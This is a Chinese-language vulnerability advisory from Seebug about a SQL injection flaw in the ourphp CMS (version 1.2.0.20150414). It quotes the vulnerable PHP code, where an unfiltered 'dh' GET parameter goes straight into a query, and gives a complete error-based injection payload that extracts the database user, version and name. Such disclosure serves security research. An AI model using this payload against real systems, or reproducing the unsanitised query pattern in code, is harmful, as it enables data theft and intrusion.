ourphp最新版注入漏洞又1枚(可出任意数据)

2015-04-22T00:00:00
ID SSV:96063
Type seebug
Reporter Root
Modified 2015-04-22T00:00:00

Description

简要描述:

ourphp最新版注入漏洞又1枚

详细说明:

看到wooyun上ourphp这个厂商又出新的版本了,说修改了wooyun上现有的漏洞,我也来凑凑热闹吧。下载最新版本(ourphp_v1.2.0.20150414),2015-04-14更新的,研究学习一下。 注入一枚(这个地方前面提了下个漏洞了,当时没有注意到竟然还有个参数存在注入,无心刷洞): GET /client/user/?cn-usershopping.html-&ourphp_cms=del&id=1&dh=1 其中dh未过滤,存在注入,看代码

`` 无关代码 elseif ($_GET["ourphp_cms"] == "del"){ $query = $db-> sqllist("selectid,OP_Orderspay,OP_Orderssendfromourphp_orderswhereid= ".$_GET['id']." &&OP_Ordersnumber` = '".$_GET['dh']."'"); $ourphp_rs = mysql_fetch_array($query); if(!mysql_num_rows($query)){ exit("no!"); } if($ourphp_rs[1] == 2){ exit("no!"); } if($ourphp_rs[2] == 2){ exit("no!"); }

$query = $db-> sqllist("delete from `ourphp_orders` where `id` = '".$_GET['id']."'"); 
exit("<script language=javascript>location.replace('".$ourphp_webpath."client/user/?".$ourphp_Language."-usershopping.html');</script>");

} ```

直接把通过GET获得dh带入了sql语句执行,可注入出任意数据 Payload:GET提交

/client/user/?cn-usershopping.html-&ourphp_cms=del&id=1&dh=1'/**/UNION/**/SELECT/**/1/**/FROM(SELECT/**/COUNT(*),CONCAT(0x23,(SELECT/**/concat(user(),0x23,version(),0x23,database())/**/FROM/**/ourphp_admin/**/LIMIT/**/0,1),0x23,FLOOR(RAND(0)*2))x/**/FROM/**/INFORMATION_SCHEMA.tables/**/GROUP/**/BY/**/x)a%23

测试如下图

<img src="https://images.seebug.org/upload/201504/18212546fcf4aba78280b2e0e6b856260c055965.jpg" alt="成功.jpg" width="600" onerror="javascript:errimg(this);">

漏洞证明:

见 详细说明